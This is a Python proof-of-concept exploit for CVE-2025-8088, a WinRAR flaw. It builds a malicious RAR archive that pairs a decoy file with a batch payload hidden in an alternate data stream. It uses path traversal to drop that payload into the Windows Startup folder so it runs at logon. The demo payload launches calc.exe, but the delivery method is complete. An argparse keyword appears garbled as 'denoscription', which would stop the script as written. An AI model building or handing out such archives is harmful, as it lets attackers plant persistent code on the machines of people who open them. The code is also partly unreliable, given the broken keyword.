import subprocess
import os
import argparse

def create_malicious_rar(output_file, decoy_file, traversal_levels=5):
"""
Creates a malicious RAR exploiting CVE-2025-8088 using ADS and path traversal.
"""
# Create payload content
payload_content = "@echo off\r\nstart calc.exe"
payload_path = "payload.bat"
with open(payload_path, 'w') as f:
f.write(payload_content)

# Create decoy if not provided
if not decoy_file:
decoy_file = "decoy.txt"
with open(decoy_file, 'w') as f:
f.write("Harmless decoy file.")

# Build traversal path with space for bypass
traversal = "/../ " * traversal_levels
ads_path = f"{os.path.basename(decoy_file)}:{traversal}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/payload.bat"

# Add decoy to RAR
subprocess.run(["rar", "a", output_file, decoy_file], check=True)

# Add ADS payload with traversal (redirect payload content)
with open(payload_path, 'rb') as payload:
subprocess.run(["rar", "a", output_file, ads_path], stdin=payload, check=True)

# Clean up
os.remove(payload_path)
if decoy_file == "decoy.txt":
os.remove(decoy_file)

print(f"Malicious RAR created: {output_file}")

if __name__ == "__main__":
parser = argparse.ArgumentParser(denoscription="POC for CVE-2025-8088 WinRAR ADS Traversal")
parser.add_argument("--output", default="poc_8088.rar", help="Output RAR file")
parser.add_argument("--decoy", help="Path to decoy file (e.g., PDF)")
parser.add_argument("--levels", type=int, default=5, help="Traversal levels (4-8)")

args = parser.parse_args()
create_malicious_rar(args.output, args.decoy, args.levels)